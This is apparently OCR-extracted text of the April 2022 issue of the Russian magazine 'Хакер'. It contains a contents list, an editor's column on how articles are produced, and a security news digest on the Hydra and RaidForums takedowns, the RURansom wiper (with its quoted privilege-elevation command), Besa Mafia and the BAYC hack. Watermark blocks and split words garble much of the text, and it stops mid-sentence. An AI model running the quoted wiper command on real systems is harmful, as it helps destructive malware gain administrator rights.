Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

ха-277_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

12.37 Mб

Скачать

☆

1 / 41 2 3 4 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

ПОДПИСКА НА «ХАКЕР»

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Мы благодарим всех, кто поддерживает редакцию и помогает нам компенсировать авторам и редакторам их труд. Без вас «Хакер» не мог бы существовать, и каждый новый подписчик делает его чуть лучше.

Напоминаем, что дает годовая подписка:

год доступа ко всем материалам, уже опубликованным на Xakep.ru;

год доступа к новым статьям, которые выходят по будням;

полное отсутствие рекламы на сайте (при условии, что ты залогинишься); возможность скачивать выходящие

каждый месяц номера в PDF, чтобы читать на любом удобном устройстве;

личную скидку 20%, которую можно использовать для продления

годовой подписки. Скидка накапливается с каждым продлением.

Если по каким-то причинам у тебя еще нет подписки или она скоро кончится, спеши исправить это!

hang

NOW!

BUY

w Click

Апрель 2022

-x

-x ha

№ 277

CONTENTS

Как делают сардельки Колонка главреда

MEGANews

Самые важные события в мире инфосека за апрель

Вызов Инжектим

мастеру ключей шелл-код в память KeePass, обойдя антивирус

ShadowCoerce

Как работает новая атака на Active Directory

Herpaderping и Ghosting Изучаем два новых способа скрывать процессы от антивирусов

Электронная психобумага Критическая уязвимость в Java позволяет подделывать электронные подписи и ключи

Фундаментальные основы хакерства Ищем операнды при взломе программ

Фундаментальные Ищем тестовые строки в

основы хакерства чужой программе

HTB Over ow

Упражняемся в атаке

padding oracle и эксплуатируем баг в ExifTool

HTB Toby

Взламываем сервер через череду чужих бэкдоров

HTB Backdoor Взламываем сайт на Wordpress и практикуемся в разведке

Решетки на «Окна» Защищаем компьютеры

Windows 10 и особенно — с Windows 11

Секреты PowerShell Пишем HTTP-запросы и парсим страницы на PowerShell

Секреты PowerShell Создаем графический интерфейс для сценариев

Музыка в пакете Автоматически конвертируем и аннотируем аудиофайлы в Windows

Цифровая электроника с самого начала Собираем схемы на MOSFET-транзисторах

Титры Кто делает этот журнал

			hang		e
		C			e	E
	X					E
	-						d
	F							t
	D							i
	D							r
P					NOW!			o
P
	wClick			BUY				o m	HEADER
	wClick		to					o m	HEADER


w
w							.c
	.						.c
	p					g
		df		c	n		e
			-x ha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df		c	n		e
				-x ha

Андрей Письменный

Главный редактор apismenny@gmail.com

КОЛОНКА ГЛАВРЕДА

Сегод ня мы с тобой будем обсуждать производс тво нажористых , сочных и всеми любимых статей «Хакера»! Почему не сарделек ? Дело в том, что этот заманчивый заголовок — лишь перевод английской идиомы «how the sausage gets made», которая подразуме вает , что раз говор пойдет о какой то внутренней кухне .

«Ни фига себе вы заморачива етесь!» — раз за разом слышу я от новых авто ров, которые внезап но узнают , сколько нужно труда , чтобы превратить прис ланный ими текст в готовую к публикации статью. Всё так: над каждым текстом работает в среднем четыре человека , и, хоть мы и можем при необходимос ти прогнать его от авторско го черновика до публикации за сутки , обычно на это уходит как минимум два три рабочих дня.

По доброй традиции (которая возникла , когда нам надоело , что в редак цию часто шлют черт те что и потом спрашива ют , почему не публику ем ) про цесс начинается с согласова ния заявки . Автор пишет один абзац, где расска зывает , зачем нужно будет читать статью и почему изложен ное в ней интерес но и полезно нашим читателям .

Это, кстати , не напрасный труд, призванный развлечь редакторов . Такие заявки не только помогают в обсуждении темы, но и еще идеаль но годятся в качестве начала текста («лида» на профес сиональном жаргоне ). Читатель, открывая статью, первым делом хочет узнать, стоит ли на нее тратить время . Почему бы не объяснить это сразу ?

Судьба у заявки может быть разной . Бывает , что редактор сразу ее одоб


ряет, решив, что отказывать			ся от такого сокровища			было бы глупо . Другие
темы ждут обсуждения		на	редколле	гии , и тогда		автор получает ответ
по результатам	. А иногда заодно и пару ценных				советов, как лучше раскрыть

тему.

Кстати , насчет тем. Мы почти всегда даем зеленый свет текстам о прак тике ИБ, если они не повторя ют какой то из недавних материалов . Любой хардкор и копание в подробнос тях мило нашим сердцам , если речь идет о взломе . Если нет, то не обессудь — тема должна быть хоть немного популярной и массовой , чтобы писать об этом статью в «Хакер».

Одновре мен но с одобрени ем заявки редактор обычно спрашива ет о сро ке сдачи . Да да, мы стараем ся не диктовать свои условия , и, если текст по своей сути не суперсроч ный , автор обычно назнача ет дедлайн сам. Одна ко совсем без сроков работать нельзя : авторы так и норовят отвлечься и позабыть об обещан ном тексте . Нужно хотя бы знать, когда начинать тыкать их палочкой !

А еще мы решили не угнетать новых авторов требова ниями к оформле нию. Текст можно слать хоть в DOCX, хоть в ODT, хоть в формате маковско го Pages — мы достаточ но уверен ные пользовате ли ПК, чтобы их открыть. Хотя если ты заготовил нам подарок в виде файла LaTeX или PDF, то все же оду майся . Мы, если надо, сконверти руем и их, но уже зловеще скрежеща зубами.

В самой редакции при этом принят формат Markdown — тот же, что использует ся, например , на GitHub. Точнее , немного модифициро ванный — чтобы учесть всякие фишечки вроде врезок и красиво оформлен ного вывода терминала . Постоян ные авторы шлют тексты именно в этом формате , чем немало экономят силы редакторам .

Когда заветный архив со статьей и картинка ми падает в почту редактору , тот должен принять важное решение: взять статью в работу или прислать автору еще больше ценных указаний .

Если текст принят , то дело за редактурой . Какие то тексты вообще в ней не нуждают ся , и по ним достаточ но лишь пройтись и пригладить последние шероховатос ти . Другие статьи проходят через серьезное переписыва ние с несколь кими раундами уточнений у автора и доделок.

Наша цель — сделать так, чтобы любой, даже самый сложный текст было легко читать, причем без всякой подготов ки. Конечно , с нашими темами такой идеал недостижим , но практика показывает , что иногда достаточ но немного распутать слишком туго закручен ные предложения , добавить пояс нений тут и там, разбить на части с понятными названи ями — и вот текст уже заиграл новыми красками .

Я всегда призываю редакторов быть с авторами помягче . Да, многие , если не большинс тво из авторов «Хакера» воспри нима ли школьные уроки русско го языка как раздра жающую повинность . Но редко когда человек блестяще раз бирается и в сложной техничес кой теме, и в особен ностях пункту ации.

Вообще , у меня есть теория, что хакеры — одни из самых плохих кан дидатов в писатели на свете . Сочетание техничес кой профес сии и склон ности к интуитив ному подходу дают совершенно непред ска зуемые резуль таты, когда человек вдруг сталкива ется с необходимостью структуриро вать и зафиксировать какие то знания при помощи слов.

Именно поэтому распутывать и переписывать — вечная и неизбежная часть нашей работы, к которой мы относим ся максималь но спокой но. Точно

так же, как в травмпункте тебя не будут стыдить за сломан ную руку, мы не будем подтру нивать над искалечен ными предложени ями . В крайнем слу чае вздохнем и скажем : «Эка, батенька , вас угораз дило !»

После редактуры текст обычно возвра щается к автору на финальную про верку . Если от приглажива ния стилис тики где то постра дал смысл, то это иде альный момент, чтобы пожаловать ся. В спорных ситуациях , когда редактор хочет написать покрасивее , а автор — пусть и занудно , но точно , я рекомен дую выбирать в пользу авторско го варианта . Впрочем , русский язык гибок, а ум — силен, поэтому почти всегда можно придумать вариант , который устроит обоих . Это одна из задач редактора .

Следом текст отправляет ся к корректо ру для финальной вычитки и устра нения ошибок , пропущен ных менее вниматель ными участни ками процес са . И наконец, приходит к выпускающе му редактору . Он вносит последние кор рективы в верстку , убеждает ся , что картинки не потерялись и крепко стоят на своих местах , подбира ет и подреза ет изображение на обложку и делает целую череду других рутинных , но необходимых дел.

В момент, когда текст публику ется на сайте , автору на почту приходит автомати ческое оповеще ние, начисляет ся месяц бесплат ной подписки (что бы можно было сразу посмотреть публикацию целиком) и 33% накопитель ной скидки . Вот и весь процесс !

Как видишь, не нужно быть каким то особен ным специалис том в написа нии текстов . Главное — чтобы содержимое было интерес ным , а уж пок расивее сформулиро вать мы поможем. Почти все статьи в «Хакере» написа ны технарями и энтузиас тами от ИБ, а не дипломиро ван ными журналис тами и литератора ми .

Если ты с интересом дочитал досюда и у тебя есть мысль написать в «Хакер», значит , эта заметка нашла своего героя. Срочно записывай свои мысли и шли заявку , можно прямо мне (адрес есть на странице контактов ). А еще можешь задать вопросы в коммента риях или сходить и все же по читать, как делают эти самые сардель ки .

hang

NOW!

BUY

w Click

-x

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w				c				o
	.				c			.c
		p					g
			df			n		e
				-x ha

Мария «Mifrill» Нефёдова nefedova@glc.ru

В этом месяце: правоох ранители закрыли «Гидру »

иRaidForums, арестовав их операто ров, NFT-проект Bored Ape Yacht Club скомпро метировали, Илон Маск купил Twitter

иотказал ся сотрудни чать с Биллом Гейтсом , драйверы AMD уличили в случай ном разгоне процес соров, россий ских раз работчиков блокиру ют на GitHub, а инженеры GitLab испра

вили опасный баг на своей платформе .

КРУПНЫЕ

ЛИКВИДАЦИИ

«Гидра»

В начале апреля Федеральное ведомство уголов ной полиции Германии (Bundeskriminalamt, BKA) и Централь ное управление Германии по борьбе с киберпрес тупностью (Zentralstelle zur Bekämpfung der Internetkriminalität, ZIT)

сообщили о ликвидации «Гидры » (Hydra Market), крупней шей в даркне те рус скоязыч ной торговой площад ки . В ходе операции немецкие власти смогли изъять у преступни ков 543 биткоина (около 25 миллионов долларов по курсу на тот момент), а также конфиско вать серверы ресурса .

По данным властей , на момент закрытия на «Гидре » насчитыва лось око ло 19 тысяч зарегистри рованных аккаунтов продав цов, которые обслужива ли не менее 17 миллионов клиентов по всему миру. При этом оборот Hydra Market в 2020 году власти оценива ют в 1,35 миллиар да долларов США, что делало сайт крупней шей торговой площад кой в даркне те.

Согласно официаль ному пресс релизу, закрытие стало возможным после продол житель ного рассле дова ния , направлен ного на ранее неизвес тных операто ров и админис тра торов платформы . Также правоох раните ли отме чают, что на Hydra Market работал миксер Bitcoin Bank, который скрывал все криптовалют ные транзакции , совершаемые на платформе , а это допол нительно затрудни ло отслежива ние средств, полученных в результате незаконной деятельнос ти .

По информации блокчейн аналити ков из компании Elliptic, с момента сво его создания в 2015 году Hydra Market была связана с криптовалют ными транзакци ями на сумму более 5 миллиар дов долларов .

««Платформа специали зировалась на продаже наркотиков , хотя в объ- явлениях на сайте также встречались поддель ные документы , данные

(например , данные кредит ных карт) и цифровые услуги . Продук ты рекламиро вались для продажи в ряде стран, таких как Россия , Укра-

ина, Беларусь и Казахстан . Также Hydra предос тавляла дополнитель - ные услуги , в том числе обмен криптоак тивами и услуги по обналичи - ванию. К тому же встроенная биржа торговой площад ки широко

использовалась для отмывания средств от взлома биржи Bitfinex »

в 2016 году», — расска зали в Elliptic.

Вскоре после этого заявления немецких властей американ ские власти сооб щили, что тоже участво вали в операции по закрытию Hydra Market. Тогда как немецкие власти не произво дили арестов , связан ных с закрыти ем «Гид ры», а также их заявления не содержали каких либо имен, Министерс тво юстиции США выдвинуло заочные обвинения против россияни на Дмитрия Олегови ча Павлова . Предполага емый админ «Гидры » обвиняет ся в сговоре с целью распростра нения наркотиков , а также сговоре с целью отмывания денег.

Якобы Павлов управлял серверами торговой площад ки через подстав ную компанию Promservice («Промсервис »), также известную как Hosting Company Full Drive (хостинго вая компания «Полный привод »), All Wheel Drive («Все колеса») и 4x4host.ru. Будучи админис тра тором серверов Hydra, Павлов яко бы вступил в сговор с другими операто рами маркет плей са , чтобы способс твовать развитию сайта , и предос тавил преступни кам критичес ки важную инфраструктуру , которая позволила Hydra работать и процветать в конкурен тной среде даркне та . Утвержда ется , что он получил миллионы долларов «комиссион ных », содействуя работе Hydra.

Около двух недель спустя Мещанский районный суд города Москвы арес товал Дмитрия Павлова . Электрон ная картотека гласит :

««Суд удовлетво рил ходатайство следствия и избрал меру пресече ния в виде заключения под стражу в отношении Павлова Д. О., который

проходит по делу, возбужден ному по ч. 5 ст. 228.1 УК РФ („Незакон- ные производс тво, сбыт или пересылка наркотичес ких средств, пси-» хотропных веществ или их аналогов в особо крупном размере “)».

При этом в интервью BBC Павлов заявил, что узнал о происхо дящем из СМИ

ине имеет никакого отношения к «Гидре ».

««Мы являемся хостинг компани ей и имеем все необходимые лицен- зии связи Роскомнад зора. Мы не занимаемся админис трированием

никаких

площадок

в принципе

, а только

предос тавля

ем серверы

в аренду как посредни

ки (перепродавая

услуги ). Мы не знаем , что

у нас хостится

, так как после предос тавле

ния доступа

к серверу

кли-

енты меняют пароль и доступ невозможен

», — расска зал Павлов жур-

налистам

и добавил, что если бы ему было известно ,

что именно

находится на серверах

, то он

«не предос

тавил

бы

оборудо

вание

ни под каким предлогом

».

Кроме того, американ ские власти объяви ли, что вводят санкции в отношении Hydra и криптовалют ной биржи Garantex. Как писал в Twitter госсекре тарь США Энтони Блинкен , эти скоорди нированные действия «демонстри руют наше стремление продол жать разрушать инфраструктуру и [подрывать работу] вымогателей ».

Garantex обвинили в содействии операци ям по отмыванию денег, про водившимся на «Гидре », что прямо нарушает существу ющие правила по борьбе с отмывани ем денег и финансирова нием террориз ма.

««Анализ известных транзакций Garantex показывает , что транзакции

на сумму более 100 миллионов долларов США были связаны с прес-


тупниками	и торговыми			площад ками		даркне та , в		том числе поч-
ти 6 миллионов		долларов		США связаны		с россий ской		RaaS-группиров	-	»
кой Conti, а также около 2,6 миллиона						долларов	США — с Hydra», —

гласит заявление			Министерс		тва финансов США.

RaidForums

Также в этом месяце в ходе международ ной операции TOURNIQUET, которую координиро вал Европол , был закрыт известный хакерский ресурс RaidForums, в основном использовав шийся для торговли украден ными базами данных . Админис тратор RaidForums и двое его сообщни ков были арестованы , а инфраструктура сайта перешла под контроль правоох ранительных органов .

«Заглушка », которая отобража ется по адресу RaidForums

Операцию больше года готовили власти США, Великобритании , Швеции , Германии , Португалии и Румынии. Министерс тво юстиции США заявило , что админис тратор сайта , известный под ником Omnipotent, был арестован

еще 31 января 2022 года в Великобритании и ему уже предъявле ны обви нения. Он находился под стражей с момента ареста до завершения процеду ры экстра диции.

Так как за псевдонимом Omnipotent скрывал ся 21-летний гражданин Пор тугалии Диогу Сантос Коэльо (Diogo Santos Coelho), выходит, что он запустил RaidForums, когда ему было 14 лет, так как сайт работал с 2015 года.

Также известно , что правоох ранители захватили домены, на которых раз

мещается RaidForums: raidforums.com, rf.ws и raid.lol.

По статис тике Министерс тва юстиции , в общей сложности на торговой площад ке было выставле но на продажу более 10 миллиар дов уникаль ных записей из сотни ворованных баз данных , в том числе затрагива ющие людей, прожива ющих в США. В свою очередь , Европол сообщает , что на RaidForums насчитыва лось более 500 тысяч пользовате лей и он был «одним из крупней ших хакерских форумов в мире». Здесь стоит добавить, что речь идет об англоязыч ных ресурсах .

««Эта торговая площад ка сделала себе имя, продавая доступы к гром- ким утечкам БД, принад лежавших различным американ ским кор-

порациям из разных отраслей. В них содержалась информация о мил- лионах кредит ных карт, номерах банков ских счетов и маршрут ной

информации , а также именах пользовате лей и связан ных с ними паролях, необходимых для доступа к онлайн аккаунтам », — сообщает » Европол .

Пока неясно , сколько времени заняло рассле дование, но, похоже, правоох ранителям удалось составить довольно четкую картину иерархии RaidForums. В пресс релизе Европола отмечает ся, что люди, которые поддержи вали работу RaidForums, занимались админис трированием, отмывани ем денег, похищали и загружали на сайт данные , а также скупали краденую информа цию.

При этом упомяну тый Диогу Сантос Коэльо якобы контро лировал RaidForums с 1 января 2015 года, то есть с самого старта , и управлял сайтом

при поддер жке

несколь

ких

админис тра торов

, организо

вав

структуру

для продвижения

покупки и продажи

ворованных данных . Чтобы получать при

быль, форум взимал

с пользовате

лей

плату за различные

уровни членства

и продавал

кредиты

, которые позволяли

участни кам

получать доступ к более

привиле

гиро

ван ным

областям сайта или к ворованным

данным .

Коэльо

также выступал

в качестве посредни

ка и гаранта между сторона

ми ,

совершающи

ми сделки , обязуясь

следить

, чтобы покупатели

и продав цы соб

людали соглашения

Интерес

но , что еще в феврале

2022 года преступни

ки и ИБ исследова

тели заподозрили

, что RaidForums захвачен

правоох

ранитель

ными

органами

так как сайт начал отображать

форму входа на каждой

странице

. При попытке

войти на сайт тот просто снова показывал

страницу

входа , и многие пред

положили , что сайт захвачен

и это фишинговая

атака правоох

раните

лей

которые пытаются

получить учетные

данные

злоумыш

ленни

ков .

27 февраля

2022 года DNS-серверы

raidforums.com и вовсе изменились

на jocelyn.ns.cloudfare.com и plato.ns.cloudfare.com, что только убедило

хакеров в их правоте

. Дело в том, что в прошлом

эти DNS-серверы

исполь

зовались другими

сайтами

, захвачен

ными

властями

, включая weleakinfo.com

и doublevpn.com.

44 МИЛЛИАРДА ЗА TWITTER

Компания Twitter официаль но объяви ла о том, что принима ет предложение Илона Маска , который покупает компанию за 44 миллиар да долларов , чтобы сделать ее частной . О желании купить Twitter Маск заговорил в начале апреля 2022 года и сообщил , что уже при обрел 9% акций. Сначала Маск планиро вал войти в совет директоров , но потом оставил эту идею, решил приобрести Twitter полностью , что и осущес твил букваль но через пару недель.

Маск заявляет , что делает это ради принципов свободы слова , которых, по его мнению , должна придер живать ся платформа . Также он обещал бороться с армиями ботов, спамом и так называемы ми теневыми банами.

RURANSOM

УНИЧТОЖАЕТ

ДАННЫЕ

РОССИЙСКИХ

КОМПАНИЙ

Специалис ты VMware предуп редили сообщес тво об активности вайпера RURansom, который атакует россий ские системы и умышленно уничтожа ет их данные , включая резервные копии. В отличие от обычных шифроваль щиков , которые вымогают выкуп у постра дав ших , автор RURansom не просит денег, а просто стремит ся причинить ущерб РФ.

Еще в начале марта о RURansom писали аналити ки компании Trend Micro, которые предос терега ли пользовате лей и компании об опасности нового вайпера (wiper, от английско го to wipe — «стирать », «очищать »). По информа ции компании , вредонос появился еще 26 февраля и был создан как деструк тивное ПО, специаль но нацеленное на уничтожение резервных копий и дан ных жертв.

Как теперь сообщили эксперты VMware, подготовив шие собствен ный ана лиз, вайпер написан на .NET и распростра няется подобно червю , копируя себя в виде файла с двойным расширени ем doc.exe на все съемные диски и подклю ченные сетевые ресурсы .

После запуска на машине жертвы малварь немедленно вызывает функцию IsRussia(), проверяя общедос тупный IP-адрес системы с помощью сервиса ,

расположен ного по адресу https://api[.]ipify[.]org. Затем RURansom исполь

зует IP-адрес для определе ния географичес кого местополо жения машины с помощью известной службы геолокации , используя формат URL-адреса https://ip-api[.]com/#<публичный IP>.

Если жертва находится не в России , малварь выводит на экран сообщение «Программу могут запускать только россий ские пользовате ли » и прекраща ет выполнение .

Если же процесс не прерван , вредонос получает привиле гии админис тра

тора с помощью cmd.exe /c powershell start-process -verb runas и приступа ет к шифрованию данных . Шифрование применя ется ко всем расширени ям , кроме файлов .bak, которые удаляют ся . Файлы шифруют ся с использовани ем алгорит ма AES-CBC с жестко запрограм мирован ной солью и случай но сге нерирован ным ключом длиной , равной Base64 ("FullScaleCyberInvasion

+ " + MachineName).

При этом записка , оставленная автором малвари в коде и файле «Пол номасштаб ное _кибервтор жение .txt», гласит , что ему не нужен выкуп и он хочет причинить ущерб России , отомстив за «специаль ную военную опе рацию» в Украине .

««Нет никакого способа расшифро вать ваши файлы . Никакой оплаты , только ущерб», — заявляет разработ чик в сообщении , пропущен ном » через Google Translate.

0-DAY-БАГОВ ВСЕ БОЛЬШЕ

Специалис ты Google Project Zero и компании Mandiant раскры ли статис тику об уязвимос тях нулевого дня, обнаружен ных в 2021 году. По данным аналити ков, количество случаев исполь зования 0-day растет и чаще всего за такими атаками стоят китайские хакеры.

В общей сложности в 2021 году Google Project Zero было обнаруже но и раскры то 58 уязвимос тей нулевого дня.

Для сравнения : в 2020 году было обнаруже но только 25 0-day-экспло итов, а предыду щий рекорд и вовсе был установ лен в 2015 году — 28 экспло итов.

Такой прирост эксплу атируемых багов эксперты связыва ют с более частым обнаруже нием

ираскры тием уязвимос тей и говорят, что хакеры «используют одни и те же шаблоны багов

иметоды эксплу атации, атакуя одни и те же области».

Из 58 уязвимос тей нулевого дня 39 были связаны с поврежде нием информации в памяти, а за ними следуют 17 багов use after free, 6 проблем out of bounds чтения , 4 проблемы перепол нения буфера и 4 бага целочисленно го переполнения .

Согласно отчету Mandiant, в прошлом году было зарегистри рова но 80 случаев исполь зования 0-day-уязвимос тей , что на 18 больше , чем в 2020-м и 2019 годах, вместе взятых .

Активнее всего уязвимос ти нулевого дня эксплу ати ровал Китай , на второе место Mandiant ста вит Россию с двумя экспло ита ми , а замыкает тройку Север ная Корея с одним экспло итом в арсенале .

Продолжение статьи0 →

				hang			e
			C				e	E
		X						E
	-								d
	F									t
	D									i
	D									r
P							NOW!			o
P
					BUY
				to	BUY
w Click				to							m
w Click											m
w
	w				c					o
	.				c				.c
		p						g
			df	-x			n		e
				-x		ha

← 0Начало статьи

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w				c				o
	.				c			.c
		p					g
			df			n		e
				-x ha

GOOGLE ЗАПРЕЩАЕТ ЗАПИСЬ ЗВОНКОВ

Компания Google анонсирова ла новые правила , которые, по сути, запреща ют приложе ния для записи звонков . В рамках борьбы с приложе ниями, которые злоупот ребляют API-интерфейсами Accessibility Service в Android, запись

звонков через эти API-интерфейсы теперь будет запрещена

. Дело в том, что

API Accessibility Service — это практичес

ки единствен

ный

способ

для сторон

них приложе

ний

записывать

звонки

на Android, а значит , приложе

ния

для записи звонков теперь «вне закона».

NLL Apps, разработ

чик приложе

ния

ACR Phone для записи звонков , нас

читывающе

го более миллиона

загрузок

в Google Play Store, вниматель

но сле

дит за изменени

ями

правил Google. Он одним из первых обратил внимание

что страница

поддер жки Google Play теперь гласит : «API для специаль

ных воз

можностей не предназна

чен для удален ной

записи звонков и не может зап

рашиваться для этой цели». Новый запрет вступает

в силу 11 мая 2022 года,

то есть в день старта конферен

ции

Google I/O.

При этом не названо

никакой четкой

причины

, по которой Google вдруг

запреща

ет запись звонков и такие приложе

ния в Play Store. Конечно , во мно

гих странах для записи звонка требует

ся получить согласие

одного или нес

кольких его участни ков , но, когда это требова

ние выполнено

, записывать

раз

говор можно абсолют но законно .

Интерес

но ,

что

при

этом

Google

не

возника

ет никаких проблем

с записью звонков , если речь идет о ее собствен

ных

приложе

ниях

. К при

меру, приложе

ние

Google Recorder — это продукт , полностью

постро енный

на полезности

записи звонков . Также приложе

ние

Google Phone на телефо

нах Pixel поддержи

вает

запись звонков

во многих странах мира. Разработ

чики сетуют , что Google просто не предос тавля

ет им нужных

API, чтобы сто

ронние

приложе

ния

могли конкуриро

вать

на этом рынке , а теперь ИТ гигант

ивовсе закрыва ет оставав шиеся обходные пути.

Впрошлом Google уже заявля ла, что будет лучше , если API-интерфейсы Accessibility Service будут использовать ся только приложе ниями, предназна

ченными для людей с ограничен ными возможнос тями . Но в силу того, что для многих функций попросту не существу ет других вариантов , не связан ных

с Accessibility Service, многие приложе ния все равно вынуждены использовать эти API-интерфейсы .

Также в прошлом Google уже отключала приложе ния от API Accessibility Service, похоже намереваясь бороться с записью звонков , но в итоге в ком пании отказались от этих планов . В 2020 году во второй версии Android 11 Developer Preview на короткое время даже появился API ACCESS_CALL_AUDIO, предназна ченный для записи звонков , хотя в итоге он не попал в релиз.

Теперь многие журналис ты и разработ чики предполага ют , что план выг лядел именно так: начать поддержи вать запись звонков с помощью спе циального API, а через несколь ко лет запретить приложе ниям использовать

для этих целей API Accessibility Service. Вместо этого получилось , что Google запреща ет все приложе ния для записи звонков в Google Play Store, не давая их создателям никакой альтер нативы.

УДАЛЕНКА ДЛЯ ОСУЖДЕННЫХ

В кулуарах стратеги ческой конферен ции «Импортонеза висимость», прошед шей в Новосибир ске, журналис ты получили интерес ный коммента рий от замгла вы ФСИН Алексан дра Хабарова . Он сообщил , что ФСИН рассмат рива ет возможность привлечения IT-специалис тов , отбы вающих наказание в исправитель ных центрах , к удален ной работе на коммерчес кие компании . Сообщает ся, что с такими предложени ями к ведомству обратились в ряде регионов России .

«Таких специалис

тов не так много . К нам с этой инициати

вой

выходят в ряде

→территорий

, в ряде субъектов

предпри нима

тели

, которые в этой области

работают . Мы только на начальном

этапе . Если это востре бова

но , а это, скорее

всего , востре бова

но , думаем , что мы специалис

тов

в этой области не будем

заставлять

работать на каких то других производс

твах

»,

— сообщил Хабаров.

АВТОРОВ BESA MAFIA

ПОЙМАЛИ

Румын ская

полиция арестовала

пятерых мужчин , стоявших

за самым извес

тным сайтом

заказных убийств в даркне те , который носил имена Besa Mafa,

Camorra Hitman, а с недавних времен

— Hitman Marketplace №

1. По сути,

ресурс был фальшив кой , никаких киллеров

админис тра торы

сайта не знали

и не нанимали , но это

не мешало

им

брать

за поиск

исполнителей

от 5 до 20 тысяч долларов

в биткоинах

Сайт был создан

еще в 2010-х и якобы предлагал

посетителям

площад ку

для поиска исполнителей

заказных убийств . Пользовате

лей

просили

предос

тавить данные

о цели, информацию

о том, как и когда должно

произой

ти

убийство

, а затем просили

оплатить

«комиссию » в биткоинах

С самого начала было ясно, что сайт, скорее всего , мошенничес

кий , но за

долгие

годы его работы админис тра ция

приняла

тысячи заказов и нашла

себе множес тво платных

клиентов

. Мужья заказывали

убийства

своих жен,

деловые партне ры искали убийц для коллег , человек, потерявший

деньги

на сайте спортивных

ставок , попросил

убить предста вите

ля службы поддер

жки, который отказал ся помочь вернуть

средства , нашелся даже тот, кто

заказал убийство

14-летнего

подрос тка .

Многие

подробнос

ти о Besa Mafa стали известны еще в 2016 году, когда

сайт взломали

, а информация о

пользовате

лях сайта и их заказах стала дос

тоянием обществен

ности

. Напомню , что тогда ресурс заявлял , будто связан

с албанской

мафией .

Как сообщило теперь Румынское управление по рассле дова нию организо ванной преступнос ти и террориз ма (DIICOT), рейды и задержания были про ведены по запросу американ ских властей . Министерс тво националь ной безопасности США и ФБР много лет рассле дова ли дела, связан ные с этим ресурсом . Как пишет DIICOT:

««Власти США установи ли, что эта группа состоит из пяти или более лиц, находящих ся на территории Румынии, и координиро ванно

управляет этими сайтами и отмывает деньги , полученные в результате » подстре кательств к убийствам ».

Витоге операции были задержаны пять человек и четыре свидете ля.

ИБ эксперт Кристофер Монтей ро (Christopher Monteiro) детально изучал активность Besa Mafa еще в 2016 году и посвятил этому серию статей в сво ем блоге — и настоль ко разозлил админис тра торов сайта , что они угрожали

ему лично . В те годы Монтей ро писал, что Besa Mafa — это мошенничес тво и в какой то мере городская легенда . Однако пользовате ли сайта относились

к своим «заказам» серьезно , действи тельно хотели причинить другим людям реальный вред, и эксперт долго пытался предуп редить об этой опасности власти .

К сожалению , правоох раните ли всерьез занялись Besa Mafa только в 2020-х. В итоге , по оценке Монтей ро , с тех пор было арестовано око ло 25 заказчиков , однако админис тра ция сайта до недавнего времени оста валась неуловимой .

В течение многих лет властям было неизвес тно, кто стоит за Besa Mafa, так как за все контакты с пользовате лями отвечал некто «Юра» (Yura). Он общался с людьми , которые задавали вопросы об услугах киллеров , побуж дал их делать заказы и на ломаном английском старал ся развеять все их опа сения. Опираясь на логи таких чатов, власти предполага ли, что он прожива ет в Восточной Европе (скорее всего , в Румынии).

Даже сейчас , после всех арестов и обысков , неясно , была ли Besa Mafa детищем одного человека , который развил свой «бизнес » до такой степени , что ему потребова лась поддер жка целой команды , или за сайтом всегда сто яла некая группиров ка .

DIICOT сообщает , что ущерб от работы Besa Mafa оценива ется пример но

в500 тысяч евро, но, если бы мошенники хранили биткоины , полученные

в2016 году, вероятно , сегодня те стоили бы гораздо больше .

Упомяну тый Кристофер Монтей ро , который годами пытался привлечь вни мание к проблеме Besa Mafa, отнесся к новости о возможном задержании «Юры» неоднознач но .

««Хорошо, что международ ная операция правоох ранительных органов привела к задержанию этих преступни ков, но начнут ли они ког- да нибудь активное рассле дование по тысячам имен из „списка смер-» тников “?» — комменти рует исследова тель.

ДЕНЬГИ REVIL

Замес титель министра внутренних дел РФ — начальник Следствен ного департамен та МВД Сер гей Лебедев расска зал , что у участни ков REvil, арестован ных в январе текущего года, были изъяты огромные суммы денег: более 300 миллионов рублей , 950 тысяч долларов , свы

ше 1 миллиона евро, флеш накопитель с 19,9 биткоина .

Об аресте 14 человек, связан ных с REvil, ФСБ объяви ла в середине января 2022 года. Тогда обыски и аресты прошли по 25 адресам в Москве , Санкт Петербурге , Ленинградской и Липец кой областях.

В настоящее время следова тели уже провели более 50 допросов и 26 обысков , также про водится 16 технико кримина лис тичес ких и компьютер ных судебных экспертиз .

BORED APE YACHT CLUB ВЗЛОМАЛИ

Хакеры

неизвес

тным

образом

скомпро мети

рова

ли

Instagram-аккаунт *

и Discord-сервер

известно го NFT-проекта

Bored Ape Yacht Club. Злоумыш

ленники распростра

нили

среди подписчи

ков

рекламу

фейкового

airdrop’а

с вредонос

ной

ссылкой

и в итоге похитили NFT общей стоимостью

око

ло 3 миллионов

долларов

Предста вите

ли компании

Yuga Labs, стоящей

за Bored Ape Yacht Club,

сообщили

о взломе в официаль

ном

Twitter.

«Похоже,

что

Instagram*

BAYC

взломан .

Никакого

минтинга

«не нажимайте на ссылки и не связывай

те свой кошелек ни с чем», —

предуп редили

в Yuga Labs.

Через

